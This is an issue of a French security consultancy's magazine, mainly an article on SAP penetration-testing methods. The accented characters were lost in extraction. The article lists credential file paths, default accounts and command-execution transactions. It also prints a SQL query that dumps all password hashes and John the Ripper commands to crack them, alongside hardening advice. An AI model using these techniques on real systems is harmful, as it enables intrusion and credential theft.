xmco actusecu 37 tests intrusion sap

Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.

1

lACTUSCU est un magazine numrique rdig et dit par les consultants du cabinet de conseil XMCO JUIN 2014

gTar

ded

37actuscu

Et toujours la revue du web et nos Twitter favoris !

Tests dintrusion SAPEtat de lart sur les mthodes dintrusion utilises sur ce type denvironnement

ConfrencesHackito Ergo Sum et Gsdays

Les dessous de BlackPOSAnalyse du malware utilis dans le cadre de lattaque de Target

Actualit du moment Faille Heartbleed (2014-0160), Apple vs SSL et Bitcoins


2

www.xmco.fr

we deliver security expertise


3

Vous tes concernpar la scurit informatique

de votre entreprise ?XMCO est un cabinet de conseil dont le mtier est laudit en scurit informatique.

Fond en 2002 par des experts en scurit et dirig par ses fondateurs, les consultants de chez XMCO ninterviennent que sous forme de projets forfaitaires avec engagement de rsultats. Les tests dintrusion, les audits de scurit, la veille en vulnrabilit constituent les axes majeurs de dveloppement de notre cabinet.

Paralllement, nous intervenons auprs de Directions Gnrales dans le cadre de missions daccompagnement de RSSI, dlaboration de schma directeur ou encore de sminaires de sensibilisation auprs de plusieurs grands comptes franais.

Pour contacter le cabinet XMCO et dcouvrir nos prestations : http://www.xmco.fr

Test dintrusion

Audit de Scurit

Certification PCI DSS

Cert-XMCO : Veille en vulnrabilits et Cyber-surveillance

Cert-XMCO : Rponse intrusion

Mise lpreuve de vos rseaux, systmes et applications web par nosexperts en intrusion. Utilisation des mthodologies OWASP, OSSTMM, CCWAPSS.

Audit technique et organisationnel de la scurit de votre Systme dInformation. Best Practices ISO 27001, PCI DSS, Sarbanes-Oxley.

Conseil et audit des environnements ncessitant la certification PCI DSS Level 1 et 2.

Suivi personnalis des vulnrabilits, des menaces et des correctifs affectant votre Systme dInformation et surveillance de votre primtre expos sur Internet

Dtection et diagnostic dintrusion, collecte des preuves, tude des logs, autopsie de malware.

Nos services

we deliver security expertise


4

p. 6

Les dessous de BlackPOSAnalyse du malware utilis dans le cadre de lattaque de Target

Tests dintrusion SAPEtat de lart sur les mthodes dintrusion utilises sur ce type denvironnement

p. 43

ConfrencesHackito Ergo Sum et Gsdays

Actualit du moment Faille Heartbleed (2014-0160), Apple vs SSL et Bitcoins

Contact Rdaction : [email protected] - Rdacteur en chef : Adrien GUINAULT - Direction artistique : Romain MAHIEU - Ralisation : Agence plusdebleu - Contributeurs : Antonin AUROY, Stphane AVI, , Etienne BAUDIN, Frdric CHARPENTIER, Charles DAGOUAT, Damien GERMONVILLE, Yannick HAMON, Marc LEBRUN, Romain LEONARD, Thomas LIAIGRE, Cyril LORENZETTO, Rodolphe NEUVILLE, Julien MEYER, Stphanie RAMOS, Arnaud REYGNAUD, Julien TERRIAC, Pierre TEXIER, David WEBER.

Conformment aux lois, la reproduction ou la contrefaon des mo-dles, dessins et textes publis dans la publicit et la rdaction de lActuScu 2014 donnera lieu des poursuites. Tous droits rservs - Socit XMCO. la rdaction dcline toute responsabilit pour tous les documents, quel quen soit le support, qui lui serait spontanment confi. Ces derniers doivent tre joints une enveloppe de rexpdi-tion prpaye. Ralisation, Juin 2014.

p. 20

sommairep. 6

p. 43

p. 64

p. 30

p. 30

p. 64

La revue du web et TwitterSlection de liens et de comptes Twitter

p. 20


5

> Introduction

Des technologies varies

Une architecture SAP se compose de nombreuses briques techniques, savoir :

+des serveurs Windows et/ou Linux hbergeant les lo-giciels SAP ;

+dun routeur SAP (SAProuter), sorte de proxy per-mettant daccder lensemble des points dentres of-ferts par larchitecture. Il permet ainsi de centraliser les connexions sans avoir exposer les autres composant ;

Depuis quelques annes, les ERP sont devenus une pierre angulaire dun Systme dInformation. Ces architec-tures permettent dagrger et de consolider les donnes sensibles de nombreux dpartements de lentreprise en une seule et mme application. Dans ce milieu, deux entreprises se partagent la part du gteau : People Soft (Oracle) et SAP. La scurit de ces architectures est donc devenue primordiale et la complexit de ces dernires induit des failles de scurit diverses et varies.

Dans cet article, nous tenterons dexpliquer les principaux axes dattaques des architectures SAP et les vulnra-bilits les plus communment rencontres lors de tests dintrusion.

lheure o nous crivons cet article, Intrinsec nous a dj devanc et prsente certains dtails techniques dans le numro 72 de MISC ;-) Nous tenterons donc de complter ces propos avec dautres exemples et scnarios concrts dexploitation.

> Etat de lart des tests dintrusion SAP

Par Marc LEBRUN et Adrien GUINAULT

+dapplications web (Netweaver, Business Object, etc) ;

+de bases de donnes (Microsoft SQL, Oracle) qui stockent les donnes et les informations dauthentifi-cation des utilisateurs.

Tests dintrusion SAP

jayg

oldm

an


6

Les interfaces utilisateur

Ct client, deux moyens sont gnralement utiliss pour accder larchitecture SAP :

+un client lger (navigateur) au travers de linterface ICM (composant Web de SAP Netweaver) ;

+un client lourd appel SAPGUI au travers dun proto-cole propritaire (gnralement via un port dans la plage 32XX).

Lauthentification sur un environnement SAP ncessite un identifiant, un mot de passe ainsi quun numro de client (mandant), information 3 chiffres (de 000 999) per-mettant dorganiser et de cloisonner les donnes.

Les protocoles utiliss

Les protocoles utiliss dans ce type darchitecture sont nombreux. Cependant, pour la plupart des attaques et des risques que nous allons prsenter par la suite, seuls 4 pro-tocoles sont retenir. Ces derniers constituent les portes dentre lenvironnement SAP.

On retrouve donc ces quatre protocoles principaux :

+HTTP/HTTPS pour les accs au portail web et pour in-teragir avec la SAP MMC (fonctions normalement rser-ves aux administrateurs). Les ports associs sont 80, 443 ou 50100 (pour le portail web) et 50013 pour la console MMC (ces ports peuvent bien sr varier dune architecture lautre).

+le protocole SAP DIAG (Dynamic Information and Ac-tion Gateway), protocole propritaire SAP utilis pour la communication client/serveur entre le client SAP GUI et linstance SAP. Nous verrons par la suite quil souffre dun problme important sil nest pas implment avec des options de scurit additionnelles. Le service en question sexcute gnralement sur les ports 32XX ou 33XX.

+le protocole RFC (Remote Function Call) utilis pour appeler des modules SAP et raliser des oprations dis-tance sur les systmes SAP. Ce protocole est gnralement expos sur les ports 80XX et implment par la gateway (SAProuter)

+les protocoles de bases de donnes propritaires (Oracle et Microsoft SQL essentiellement) lorsque larchi-tecture na pas t dploye dans les rgles de lart (port SQL expos directement sur le rseau...).


7

> Vulnrabilits affectant le socle de linfrastructure

Lors de la ralisation daudits sur des environnements SAP, il est important de ne pas ngliger linfrastructure sous-jacente. En effet, linstar de nimporte quel test dintru-sion ou audit ralis en interne, il faut aborder lenviron-nement audit comme un tout o une faiblesse affectant le socle systme peut tout autant conduire la compro-mission de donnes mtiers quune vulnrabilit affectant la solution elle-mme.

Les systme dexploitation

Premier point, le systme dexploitation. Enfin plus prci-sment, les systmes dexploitation. En effet, il nest pas rare que plusieurs types de systmes dexploitation consti-tuent la base de lenvironnement SAP. Windows, distribu-tions Linux (commerciales ou non) ou autres Solaris et AIX ont tous leurs spcificits et les attaques habituellement ralises sur ces systmes doivent galement faire partie intgrante de la dmarche daudit/test dintrusion SAP. Nous ne dtaillerons pas ici la mthodologie prcise mise en uvre par les quipes dXMCO, mais quelques points de contrle importants doivent toutefois tre mentionns.

+Les partages rseauIls regorgent souvent de documents sensibles, fichiers de configuration, scripts dinstallation ou de maintenance, tous susceptibles de contenir des donnes didentification rutilisables sur le rseau. Le raccourci du pentester en somme... Les environnements SAP ny chappent pas et les partages rseau doivent tre soigneusement pluchs afin dy trouver scripts VBS/VBE, documents Excel, voire mme fichiers de configuration SAP. Ces fichiers fourniront des informations relatives aux systmes et aux services dploys, identifiants et, trop souvent, des mots de passe permettant de se connecter sur une interface administra-tive, un domaine ou une base de donnes.

+Les comptes sur le systmeEn dehors des comptes Administrateur, Administrator, admin ou root, souvent prsents par dfaut sur certains systmes, on peut galement compter sur la prsence de comptes utilisateurs ncessaires au bon fonctionnement de linfrastructure SAP. Chaque machine de lenvironne-ment se voit habituellement attribuer un SID ( SAP Sys-tem Id , ne pas confondre avec les SID de bases de don-nes Oracle), et des comptes locaux bass sur ce SID sont crs afin de servir de comptes de service. Par exemple

il nest pas rare de trouver des comptes locaux dont les noms dutilisateurs prennent une des formes suivantes :

+adm ;+ORA ;+SAPService.Dcouvrir la prsence de comptes locaux par dfaut ou dont le nom dutilisateur est prdictible offre alors la possibilit de raliser des attaques par force brute afin didentifier ceux qui reposent sur un mot de passe faible ou trivial.

+Permissions des fichiersLa compromission dun des systmes de lcosystme SAP peut avoir des consquences fcheuses, mme si latta-quant ne dispose pas de droits super-utilisateur. En ef-fet, il nest pas rare dobserver que les contrles daccs sur certains fichiers de configuration sensibles sont trop permissifs (755 ou mme 777). Parmi les fichiers les plus intressants, on retrouve :

+les fichiers de configuration des bases de donnes Oracle (donnes, mots de passe SAP et Oracle chiffrs) :/oracle//sapdata/system_1/system.data1

+les fichiers de configuration SAP (mots de passe SAP chiffrs) :/usr/sap///sec/*

/usr/sap///sec/sapsys.pse

+Les fichiers de configuration SAP ConfigTool (informa-tions de connexion et mots de passe Oracle) :/usr/sap//SYS/global/security/data/SecStope.properties

/usr/sap//SYS/global/security/data/SecStope.key

+les journaux dvnements J2EE (mots de passe) :/usr/sap///j2ee/cluster/dis-patcher/log/defaultTrace.0.trc

+les fichiers de configuration ICM (mots de passe chif-frs) :/usr/sap//SYS/exe/u/NTI386/icmauth.txt

Tests intrusion SAP


8

+Le niveau de mise jourEnfin, dans le cadre de tests dintrusion en bote blanche ou si un audit de configuration est ralis en complment, il est intressant de relever la frquence et le niveau de patch des serveurs. En effet, des mises jour sont rguli-rement publies par les diteurs et corrigent des vulnra-bilits dont lexploitation pourrait avoir des consquences importantes (lvation de privilges, dni de service, etc.).

Les bases de donnes

De plus, SAP repose sur plusieurs technologies tierces : bases de donnes Oracle ou Microsoft, Java embarqu, serveurs applicatifs. ... Or, ces composants sont galement sujets des failles de scurit ou des dfauts de configu-ration et peuvent donc introduire des faiblesses au sein de lenvironnement SAP.

+OracleEn premier lieu, on retrouve les produits Oracle, notam-ment les gestionnaires de bases de donnes. Ces solutions disposent souvent linstallation de SID et comptes par dfaut qui peuvent ne pas avoir t dsactivs ou suppri-ms. De nombreux outils publics permettent lnumra-tion et la dcouverte de ces comptes et SID.

En plus des comptes Oracle habituellement prsents par dfaut,

on peut galement trouver des identifiants spcifiquement crs lors de linstallation

SAP : les comptes DBSNMP et SAPR3 sont de bons exemples...

En plus de ces comptes Oracle habituellement prsents par dfaut, sur ces bases de donnes, on peut galement trouver des identifiants spcifiquement crs lors de lins-tallation SAP : les comptes DBSNMP et SAPR3 sont de bons exemples, car ils sont crs presque systmatiquement et leurs mots de passe par dfaut sont publiquement connus.

La fonctionnalit REMOTE_OS_AUTHENT est un autre exemple de faiblesse qui peut tre apporte par un produit Oracle. Cette fonctionnalit est souvent active par dfaut au sein des environnements SAP et permet de dlguer lauthentification dutilisateurs distants leurs systmes dexploitation locaux respectifs. Cette fonctionnalit est souvent abuse par les attaquants, qui crent un compte dont le nom dutilisateur respecte la nomenclature Oracle (prfix par OPS$, en gnral) sur leur systme local afin de se connecter distance sur les bases de donnes sans avoir connatre le mot de passe de ce compte Oracle.

Il faut galement noter que certaines versions des pro-duits SAP ou des environnements spcifiques peuvent n-

cessiter lactivation de cette fonctionnalit pour fonction-ner correctement. Dans ce cas, concevoir un mcanisme ad hoc pour viter lutilisation de cette fonctionnalit peut savrer tre une tche complexe et coteuse.

Dans tous les cas, la compromission dune base Oracle constitue une brche majeure dans lenvironnement SAP. La rcupration de noms dutilisateurs et de condensats de mots de passe au sein de la table USR02 peut en effet permettre dobtenir des accs privilgis sur linfrastruc-ture SAP (voir Bonus).

+Microsoft SQL Microsoft SQL Server est une solution galement frquem-ment rencontre en environnement SAP et constitue un vecteur dattaques supplmentaire. Comptes par dfaut, mots de passe faibles voire triviaux et excution de com-mandes distance via la procdure xp_cmdshell, voil la mthodologie classique, souvent mise en uvre par les pirates et les pentesters. La compromission du systme sous-jacent par ce biais et la rcolte des informations et identifiants prsents sur la machine peut alors tre le point de dpart dune intrusion en profondeur dans lin-frastructure SAP.

> INFODes malwares ciblent SAP...

SAP tait jusqu prsent pargn par les malwares et autres attaques automatises par les pirates. Il semblerait que cela ne soit dsormais plus le cas.En effet, les chercheurs de la socit ERPScan auraient identifi un premier logiciel malveillant ciblant spcifiquement les sys-tmes SAP. Pour cela, le logiciel malveillant, un banker per-mettant de drober les identifiants et les mots de passe utiliss par les internautes afin de se connecter leur banque en ligne, embarque une nouvelle fonctionnalit permettant de dtecter la prsence du client SAP sur le poste compromis.

Daprs les premires analyses, le malware ne fait actuelle-ment rien de plus. Pour les chercheurs, cela suggre que les pi-rates valuent actuellement lintrt de sattaquer SAP. Deux options soffriraient alors aux pirates :- revendre aux personnes malveillantes intresses laccs aux systmes compromis disposant dun accs la plateforme SAP de lentreprise ;- tirer directement parti de laccs SAP.

Daprs les chercheurs, il sagit l du premier malware recher-chant spcifiquement les installations SAP. Enfin, SAP tant souvent considr comme tant le coeur de lentreprise, les attaques ciblant cette plateforme pourraient savrer particu-lirement dvastatrices pour leur sant financire.

Enfin, noter que les chercheurs ayant dcouvert le malware avaient dj rapport SAP lexistence de failles de scurit critiques pouvant tre exploites distance sans authentifi-cation pralable. SAP a publi des correctifs dans les derniers mois, mais tant donn le dlai dapplication souvent important, le danger est rel pour les entreprises utilisant SAP.


9

Les serveurs applicatifs

De nombreuses autres solutions logicielles tierces sont souvent embarques par ces systmes, tort ou raison dailleurs. Et il nest pas rare de rencontrer des serveurs applicatifs Jboss, Apache Tomcat ou IBM WebSphere qui apportent leur lot de vulnrabilits. Encore une fois, cest lexposition dinterfaces dadministration couple la prsence de comptes par dfaut qui permettent souvent aux attaquants de prendre le contrle de ces systmes sans effort. De plus, ces solutions ou les technologies sur lesquelles elles reposent (notamment Java) sont rguli-rement sujettes la publication de vulnrabilits et de codes dexploitation qui sont autant de coups ports lin-tgrit de la plate-forme.

Enfin, il ne faut pas non plus oublier que les environne-ments rgis par SAP incluent bien souvent des parties lo-gicielles dveloppes sur-mesure, parfois en interne, qui peuvent galement apporter de nouvelles failles...

Le filtrage rseau

Le filtrage rseau est le quatrime lment de linfrastruc-ture auquel il faut consacrer une attention particulire. Le nombre de services SAP ncessitant dtre exposs aux utilisateurs est, en fait, plutt rduit et il convient de mettre en place un filtrage rseau (Firewall + SAProuter) ne permettant daccder quaux htes et aux ports nces-saires.

Les ports les plus couramment utiliss par SAP sont connus:

+pour un accs par le client lourd, SAPGUI, les ports 3200 3299 sont les plus souvent utiliss, mais on retrouve sur certaines configurations les plages 33xx ou 36xx ;

+linterface web ICM est configure habituellement pour tre joignable sur le port 50013 (ou un autre de la plage 50xxx) ;

+les accs RFC distance seffectuent en gnral sur les plages 80xx (HTTP SOAP) et 81xx (HTTPS SOAP).

Dans la plupart des cas, il ny a besoin de laisser passer que le trafic entre le SAP Routeur et le client lourd. Il ny a en gnral pas de raison dexposer les autres services (SSH, listeners Oracle, Terminal Services, Web services, serveurs Web applicatifs, ...) dautres postes ou VLAN que ceux des administrateurs.

Enfin, juste quelques mots sur les accs physiques. Lin-frastructure SAP, et notamment les donnes et ressources

quelle hberge, constitue presque toujours une ressource hautement stratgique pour lentreprise audite. Il ne faut donc pas ngliger les risques lis aux accs physiques aux composants de cet environnement. Les Bonnes Pra-tiques concernant cet aspect de la scurisation des SI sap-pliquent donc ici aussi.

Tests intrusion SAP


10

> Vulnrabilits affectant les composants SAP

De prime abord, sattaquer directement lcosystme SAP peut sembler tre une tche difficile, notamment lorsquon est peu familiaris avec les produits qui le composent.

Reconnaissance et prise dempreintes

Les oprations de scanning et de dcouverte ralises dans le cadre de tests dintrusions classiques restent valides. Les outils habituellement utiliss, tel Nmap, permettront de rapidement tablir un inventaire complet des services dploys, mais lutilit de cet outil sarrte l. En effet, le Nmap Script Engine, bien que trs efficace sur certaines technologies, nembarque que peu de scripts permettant de prendre les empreintes des services SAP, lexception notable du script maxdb-info permettant dobtenir des informations techniques partir des services SAP Max DB. Enfin, pour tre tout fait honntes, les scripts NSE ciblant les services de bases de donnes Oracle trouveront bien souvent une utilit dans un contexte SAP :-)

Cependant la configuration prsente par dfaut sur ces produits peut laisser filtrer de nombreuses informations techniques, quun attaquant mettra vite profit... Ainsi, si les services ICM/ICF (SAP Internet Communication Framework) sont acces-sibles, il est bien souvent possible dinterroger ces web services SOAP sans authentification pralable.

Les informations prsentes lURI /sap/public/info, par exemple, informent ainsi tout utilisateur non authentifi sur le type de gestionnaire de base de donnes sur lequel le service repose, le type et le numro de version prcis du systme dexploitation sous-jacent et son SAP System ID (SID). Il existe dailleurs un module au sein de Metasploit permettant de raliser la rcolte de ces informations sur de nombreux services.

Ces informations peuvent galement tre obtenues en faisant appel SOAP RFC_SYSTEM_INFO, mais celui-ci ncessite de possder des identifiants valides sur ces interfaces. Toujours sans authentification, il est possible dinterroger les services SOAP de la SAP Management Console et de consulter des journaux dvnements et des traces de dveloppement :


11

Or, ces journaux dvnements conservent les traces dac-tions ralises par les utilisateurs SAP, notamment les identifiants de ces utilisateurs. Metasploit rend lextraction de ces donnes triviale :

Les comptes prsents par dfaut

Reprenons notre numration des vulnrabilits propres SAP depuis le dbut... Car la rcolte dinformations, cest trs pratique et cela permet davancer dans lintrusion en identifiant des cibles potentielles, mais nexiste-t-il pas des comptes prsents par dfaut qui fourniraient imm-diatement un accs au cur de la machine ? surprise, il existe des comptes et des mots passe prsents par dfaut sur les produits SAP aussi... Et pour ne rien arranger, il sagit le plus souvent de comptes disposant daccs privi-lgis. Parmi les plus courants, on retrouve :

En effet, il nest pas rare que nos consultants dcouvrent que ces comptes prsents par dfaut nont jamais t mo-difis par les administrateurs. Inutile de rappeler ici que les attaquants (et les auditeurs) adorent tirer parti de ces vulnrabilits particulirement triviales exploiter, peu coteuses en termes de ressource, et ce pour un profit maximal (accs super-administrateur)...

La confidentialit des changes (DIAG et HTTPs)

Les changes entre un client et un serveur constituent lune des pistes privilgies pour un attaquant. En effet, lorsque larchitecture cible est scurise et quil nexiste aucun moyen de pntrer lenvironnement SAP (ce qui arrive rarement, mais on ne sait jamais :-), lattaquant va tenter de cibler les utilisateurs finaux. Dans ce cadre, les protocoles clients deviennent importants pour la scurit de lensemble de lenvironnement.

Deux canaux privilgis sont alors prendre en compte :

+Les communications au travers du client lourd SAPLe client SAP GUI est utilis pour se connecter sur le port 32XX o le XX correspond au system number . Ce premier mode de communication client-serveur souffre malheureusement par dfaut dun problme de scurit important. En effet, les communications seffectuent au travers dun protocole propritaire appel DIAG, protocole qui ne repose sur aucune forme de chiffrement. Les don-nes sont seulement compresses par un algorithme pro-pritaire.

La faiblesse tant connue depuis quelques annes main-tenant, des chercheurs ont dcortiqu cet algorithme de compression si bien quil est maintenant trs simple de dcompresser ces donnes et de rcuprer en clair les identifiants et mots de passe transitant entre le client et le serveur.

La mthode la plus simple est dutiliser un outil cl en main tel que SapCap ou Cain & Abel, qui permettent tout deux lobtention des communications en clair.

Tests intrusion SAP


12

Parmi celles-ci, on trouve nombres de vulnrabilits Web classiques : XSS, SQL Injection, XXE... En effet, il ne faut pas oublier que SAP Netweaver est avant tout un serveur applicatif ABAP reposant sur J2EE, et tous les membres du Top10 de lOWASP peuvent donc se joindre la fte...

Une simple recherche sur CVE Details remonte 38 vulnra-bilits affectant SAP Netweaver depuis 2008, dont 6 ayant un score CVSS suprieur ou gal 7.5...

Pas moins dune douzaine de vulnrabilits XSS et trois injections SQL ont t publiquement rfrences sur ce produit sur les trois dernires annes. Mais plusieurs vul-nrabilits permettent galement un attaquant de faire raliser des actions malveillantes aux serveurs SAP, direc-tement ou non. lorigine de ces vulnrabilits, on re-trouve, par exemple :

+un servlet J2EE fournissant des fonctionnalits dexcu-tion de commandes sans authentification pralable (voir Bonus) ;

+des paramtres HTTP GET non filtrs permettant de r-aliser des attaques SMB Relay et de voler des identi-fiants valides sur le systme (et disposant de droits dad-ministration pour les systmes Windows).

Parmi ces vulnrabilits applicatives, une dentre elles a fait beaucoup de bruit. En effet, en 2011, une vulnrabilit affectant le composant ctc a t publie. Cette der-nire permettait de contourner lauthentification en en-voyant de simples requtes HTTP avec la mthode HEAD (un got de dj vu, non ?).

Ainsi, en contournant lauthentification, il tait possible dappeler des fonctions permettant dexcuter des com-mandes sur les serveurs SAP (voir capture suivante). Et comme le compte de service utilis par SAP possde trs souvent des droits levs sur le systme, lattaquant peut alors crer un utilisateur et prendre le contrle du serveur sous-jacent (si un ventuel filtrage rseau permet dat-teindre les ports 445 ou 3389).

Des outils tels que Metasploit, Bizsploit ou ERPscan sont particulirement bien quips pour exploiter les failles ap-plicatives mentionnes ici.

Une solution alternative (quand on est perdu dans les innombrables dpendances de SapCap par exemple...) est de recompiler Wireshark en incluant le dissecteur dvelopp cet effet par Core Security (disponible ici http://corelabs.coresecurity.com/index.php?action=view&-module=Wiki&name=SAP_Dissection_plu-gin_for_Wireshark&type=tool).

Une simple coute du rseau permet donc de rcuprer les identifiants de la victime. Ce problme est connu de-puis de nombreuses annes et dailleurs clairement spci-fi au sein de la note SAP 39029 :

This compression is not an encryption. To transfer data in encrypted form, use our Secure Network Communications (SNC) and an external security product. . . . For production scenarios, we strongly recommend the use of SNC.

Le protocole SNC (Secure Network Communication) peut tre utilis pour rpondre ce besoin. En effet, ce der-nier se base sur la librairie cryptographique reposant sur le standard GSS-APIv2 et permet dassurer lauthentification, lintgrit et le chiffrement des donnes changes.

En 2011, une vulnrabilit affectant le composant ctc ... permettait de

contourner lauthentification en envoyant de simples requtes HTTP

avec la mthode HEAD

Pendant longtemps limplmentation gratuite de SNC tait rserve aux communications entre serveurs. Elle est dornavant disponible gratuitement pour les clients, et ce depuis 2011. Il est donc recommand dactiver cette simple option permettant de scuriser les donnes chan-ges au travers dun protocole chiffr.

+Les communications au travers du client lgerUn dfaut de configuration similaire affecte galement souvent la console de gestion SAP, les Web Services SOAP et laccs lapplication ICM. Tous ces changes entre le client et le serveur sont en effet effectus via le protocole HTTP (non chiffr) par dfaut. Or lauthentification de luti-lisateur est ralise en Basic ou envoys en clair dans la requte POST. Les identifiants circulent donc encore une fois en clair (enfin, encods en base64 pour tre tout fait prcis) sur le rseau...

Vulnrabilits applicatives

De par leur grande popularit, notamment au sein de grands groupes, les produits dits par SAP reprsentent une cible de choix autant pour les pirates que les cher-cheurs en scurit. De nombreuses failles de scurit, aux criticits variables, ont ainsi t dcouvertes et rendues publiques ces dernires annes.


13

On surestime aussi souvent le niveau de scurit de la SAP GUI et des plus de 1000 contrles ActiveX qui laccom-pagnent lors de son installation. Ce sont autant de com-posants potentiellement vulnrables des overflows et autres vulnrabilits applicatives menant lexcution de code distance. Avant de pouvoir dposer des trojans, lire des fichiers locaux et distants, rebondir et attaquer des serveurs du LAN, il faudra tout de mme parvenir faire excuter le code malveillant un client peu mfiant (via une campagne de Phishing ou de Social Engineering par exemple). Mais ce client logiciel nest jamais mis jour manuellement par les utilisateurs et il est relativement rare que les administrateurs pensent linclure dans le processus de patch management. Ce composant repr-sente donc tout de mme un vecteur dattaque crdible.

Enfin, comme vu plus haut, on peut mettre en doute la capacit de SAP GUI protger les mots de passe des uti-lisateurs, quand ce ne sont pas les utilisateurs eux-mmes qui enregistrent leur mot de passe SAP dans le fichier rac-courci utilis pour lancer lapplication...

Problmes dautorisation et transactions dangereuses

Autre problme de scurit rcurrent, les contrles dac-cs sont parfois manquants sur certaines transactions ou fonctions RFC. La gestion et le cloisonnement des profils SAP est en effet un mtier part entire. Les autorisations des profils peuvent tre gres de manire trs prcise et ncessitent certaines comptences et une bonne compr-hension du mtier.

+Les fonctions RFCAinsi, lorsquon dispose dun compte utilisateur SAP (mot de passe par dfaut, identifiants intercepts, extrait dune base ORACLE, etc.), ltape suivante est de tenter dacc-der des fonctions RFC intressantes via les Web Services SOAP. Parmi celles-ci, RFCEXEC, SAPXPG et RFC_START_PRO-GRAM peuvent permettre lexcution de commandes sur les serveurs constituant linfrastructure SAP. Il nest mal-heureusement pas rare que des profils utilisateurs peu pri-vilgis, censs tre utiliss pour raliser des oprations mtier, disposent de droits daccs sur ces fonctions.

ltape suivante est de tenter daccder des fonctions RFC intressantes qui peuvent

permettre lexcution de commandes.

Il va sans dire que ces appels doivent tre dsactivs dans les environnements o cela est possible, ou que leur accs soit restreint aux seules personnes habilites aux opra-tions de maintenance technique.

+Les transactions dangereusesOn retrouve le mme problme avec les transactions uti-lisables depuis le client SAPGUI (avec un compte utilisa-teur SAP). Malheureusement, ou heureusement, question de point vue :-), ces autorisations sont souvent laxistes et permettent un utilisateur dappeler des transactions sensibles. Parmi les transactions intressantes, on peut noter les suivantes (la liste nest pas exhaustive) :

+SU01 (gestion des utilisateurs) ;+SU02 (gestionnaire de rles) ;+SM49 et SM69 (excution de commandes sur le sys-tme) ;

+SM59 (configuration des connexions RFC) ;+SE16 (lecture de table de base de donnes) ;+SE38 (gnrateur de programmes) ;+STMS (Transport Management System).

Ainsi, sil possde les droits pour appeler ces fonctions, un utilisateur peut excuter des commandes au travers de la transaction SM49 ou encore utiliser des transactions pour lire le contenu de la table USR02 de la base de donnes contenant les identifiants et les condensats cryptogra-phiques des mots de passe de tous les utilisateurs avec la transaction SE16... Plutt pratique, non ?

Les autres vulnrabilits affectant le SAProuter

Dautres vulnrabilits affectent galement le SAP Rou-teur, notamment des dfauts de configuration et des manques dACL, mais galement des failles relativement importantes, comme vu en 2013 avec un contournement dauthentification et un buffer overflow (CVE-2013-7093 et CVE-2013-6817).

Nanmoins, il sagit dun composant central, souvent in-

Tests intrusion SAP


14

Glossaire

+ABAP : Language de programmation utilis pour dve-lopper les applications SAP

+CRM : Customer Relationship Management (gestion des clients et ventes)

+ERP : Enterprise Resource Planning system (gestion des employs et de la productivit)

+Interfaces RFC (Remote Function Call) : Interfaces utili-ses pour excuter des commandes distance

+RFC : Remote Function Call, requtes sur des modules SAP distance

+SAP_ALL : Profil (rle) des comptes administrateurs+SAPGUI : Client lourd install sur les postes de travail+SAP Snap-In for MMC : SAP fournit par dfaut un Snap-In qui permet dutiliser la console MMC de Windows afin dinteragir avec la configuration SAP.

+SID : SAP System ID, identifiant attribuer chaque sys-tme SAP

+Transactions : squence dactions permettant dacc-der des oprations de la base de donnes SAP. Elles sont identifies par un code transaction (Ex: SU01, SE16, FK01, PA20)

Tests intrusion SAP

dispensable au bon fonctionnement de lenvironnement SAP. Et les forts risques de perturbation ou de dni de ser-vice lis lexploitation de vulnrabilits sur cet quipe-ment, nous conduisent le considrer comme un vecteur dattaque de dernier recours. En effet, mme sur un envi-ronnement de test, les clients et les responsables applica-tifs ne sont jamais enclin laisser les consultants raliser des attaques pouvant mettre en pril la disponibilit des environnements.

Cest pour cette raison que les attaques telles que Evil Twin ou encore Call back , permettant au travers denregistrement de serveurs tiers de sinsrer dans une communication entre un client et larchitecture SAP, sont rarement mises en oeuvre. En pratique, il nest quasiment jamais ncessaire de sattaquer ce composant pour mettre un pied en zone SAP.

> Conclusion

Pour faire honneur la tradition XMCO, nous vous propo-sons de conclure cet article sur quelques Quick Wins , des actions simples raliser et peu coteuses en temps et en ressources, et qui permettent nanmoins de relever le niveau de scurit de linfrastructure SAP.

+QuickWin #1 : Dfinir de nouveaux comptes super-ad-ministrateurs et retirer les privilges au compte SAP*.

+QuickWin #2 : Changer les mots de passe de tous les comptes par dfaut (SAP, Oracle, SQL Server, etc.), ou en-core mieux, les dsactiver.

+QuickWin #3 : Filtrer les accs vers les serveurs SAP, seuls les ports utiliss par SAPDIAG et la console Netwea-ver (HTTP et/ou MMC) doivent tre autoriss depuis le VLAN utilisateur.

+QuickWin #4 : Activer le SSL en cas de connexion via la MMC, les web services ou la console Web, activer le pro-tocole SNC pour les communications avec le client SAPGUI.

+QuickWin #5 : Restreindre ou dsactiver les accs aux transactions dangereuses.

+QuickWin #6 : Maintenir jour les systmes et les ap-plications.


15

>>> Bonus #1 : et le stockage des mots de passe sous SAP ?

Intressons-nous maintenant au stockage de donnes hautement critiques : les mots de passe des utilisateurs. En effet, quils soient utilisateurs simples ou admi-nistrateurs, les mots de passe des comptes sont stocks dans la base de donnes de lenvironnement SAP et plus exactement dans la table USR02.

Ces derniers peuvent tre stocks sous plusieurs formats.

Il existe 9 mthodes de stockage possdant toutes leurs caractristiques propres, comme le montre le tableau sui-vant :

En loccurrence, les mthodes de chiffrement les plus uti-lises restent la mthode B et la mthode G sachant que la mthode G embarque les hashes stocks par les m-thodes B et F.

En dautres termes, si vous avez la mthode G vous pour-rez tranquillement mener une attaque de brute-force avec un fort taux de russite sur les hashes stocks en mode B. En effet, la casse ntant pas supporte, John-the-Ripper fera son travail merveille !

Pour cela, une simple requte dans la table USR02 suffit rcuprer tous les identifiants et les hashes des tous les utilisateurs y compris ceux des administrateurs.

Avec SquirrelSQL ou un autre client SQL supportant les bases de donnes Oracle : Select bname, bcode, passcode from SID.USR02

BCODE correspondant au hash sous la forme B et PASSCODE au hash dans sa forme G.

Une fois en possession de ces donnes, il suffit de forma-ter le fichier qui sera soumis John-The-Ripper. Cependant la subtilit rside dans le fait quil faut formater les fichiers

contenant les hashes dune manire trs prcise. En effet, les hashes doivent tre soumis selon les formats suivants (en laissant 40 caractres entre le login et le hash).

A noter, un script nomm sap_prepare.pl est fourni avec John-The-Ripper et vous permet de formater ces in-formations pour quelles soient utilisables directement.

John-The-Ripper propose deux modules permettant de casser les formes B et G.

Exemples dutilisation :

$ cat hashes.txtROOT $9366B3E9E7A71CB0$ john hashes.txt$ john --format=sapb hashes.txt

$ cat hashes.txtusername:ROOT $9366B3E9E7A71CB0$ john hashes.txt$ john --format=sapb hashes.txt

Sous la forme sapg, il faut respecter le format similaire :

$ cat hashes.txtROOT $1194B48F14B9F3F-8DA1B181F14DEB70E7BDDD239$ john hashes.txt$ john --format=sapg hashes.txt

